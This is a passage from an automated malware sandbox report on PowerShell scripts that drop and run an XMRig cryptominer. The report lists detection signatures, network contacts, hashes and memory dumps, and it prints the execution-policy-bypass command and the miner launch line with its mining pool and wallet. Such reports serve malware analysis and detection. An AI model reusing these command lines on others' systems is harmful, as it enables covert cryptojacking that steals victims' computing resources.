N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/1448-3-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-5-0x00000238E0260000-0x00000238E0282000-memory.dmp

memory/1448-8-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-9-0x00000238E0420000-0x00000238E0496000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_25juxxwy.i2c.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1448-18-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-25-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-29-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-30-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmp

memory/1448-31-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-32-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmp

memory/1448-52-0x00000238E05C0000-0x00000238E05D2000-memory.dmp

memory/1448-65-0x00000238E05A0000-0x00000238E05AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/360-94-0x000001A272390000-0x000001A2723B0000-memory.dmp

memory/360-95-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-96-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-97-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-98-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-99-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-100-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-101-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-102-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-103-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-104-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-105-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-106-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-107-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-108-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-109-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-110-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-111-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-112-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-113-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-114-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-115-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-116-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-117-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-118-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-119-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-120-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-121-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-122-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-123-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-124-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-125-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-126-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-127-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-128-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-129-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-130-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-131-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-132-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-133-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-134-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-135-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-136-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-137-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-138-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-139-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-140-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-141-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-142-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-143-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-144-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-145-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-146-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-147-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-148-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-149-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-150-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-151-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-152-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-153-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-154-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-155-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-156-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

memory/360-157-0x00007FF739CD0000-0x00007FF73A903000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win10v2004-20240611-en

Max time kernel

1799s

Max time network

1789s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 13.107.21.237:443 g.bing.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
GB 184.28.176.104:443 www.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.176.28.184.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/1568-0-0x00007FFB33193000-0x00007FFB33195000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jizp5bff.0co.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1568-10-0x00000157784D0000-0x00000157784F2000-memory.dmp

memory/1568-11-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-12-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-13-0x00007FFB33193000-0x00007FFB33195000-memory.dmp

memory/1568-14-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-16-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1568-17-0x000001577A930000-0x000001577A942000-memory.dmp

memory/1568-18-0x00000157600B0000-0x00000157600BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1752-49-0x000001D19B1D0000-0x000001D19B1F0000-memory.dmp

memory/1752-50-0x000001D22EAF0000-0x000001D22EB10000-memory.dmp

memory/1752-51-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-54-0x000001D22F160000-0x000001D22F180000-memory.dmp

memory/1752-53-0x000001D22EF30000-0x000001D22EF50000-memory.dmp

memory/1752-52-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-55-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1568-56-0x00007FFB33190000-0x00007FFB33C51000-memory.dmp

memory/1752-57-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-58-0x000001D22EF30000-0x000001D22EF50000-memory.dmp

memory/1752-59-0x000001D22F160000-0x000001D22F180000-memory.dmp

memory/1752-60-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-61-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-62-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-63-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-64-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-65-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-66-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-67-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-68-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-69-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-70-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-71-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-72-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-73-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-74-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-75-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-76-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-77-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-78-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-79-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-80-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-81-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-82-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-83-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-84-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-85-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-86-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-87-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-88-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-89-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-90-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-91-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-92-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-93-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-94-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-95-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-96-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-97-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-98-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-99-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-100-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-101-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-102-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-103-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-104-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-105-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-106-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-107-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-108-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-109-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-110-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-111-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-112-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-113-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-114-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-115-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-116-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-117-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

memory/1752-118-0x00007FF6D03D0000-0x00007FF6D1003000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:25

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

memory/4288-0-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

memory/4288-3-0x0000020A373F0000-0x0000020A37412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yajzhg2p.adi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4288-10-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-11-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-12-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/4288-14-0x0000020A37A10000-0x0000020A37A22000-memory.dmp

memory/4288-15-0x0000020A375A0000-0x0000020A375AA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2440-46-0x0000023F835F0000-0x0000023F83610000-memory.dmp

memory/2440-47-0x0000023F83630000-0x0000023F83650000-memory.dmp

memory/2440-48-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/4288-50-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2440-49-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/4288-51-0x00007FFB0A173000-0x00007FFB0A175000-memory.dmp

memory/4288-52-0x00007FFB0A170000-0x00007FFB0AC32000-memory.dmp

memory/2440-53-0x0000024015AB0000-0x0000024015AD0000-memory.dmp

memory/2440-54-0x0000024015CE0000-0x0000024015D00000-memory.dmp

memory/2440-55-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-56-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-57-0x0000024015AB0000-0x0000024015AD0000-memory.dmp

memory/2440-58-0x0000024015CE0000-0x0000024015D00000-memory.dmp

memory/2440-59-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-60-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-61-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-62-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-63-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-64-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-65-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-66-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-67-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-68-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-69-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-70-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-71-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-72-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-73-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-74-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-75-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-76-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-77-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-78-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-79-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

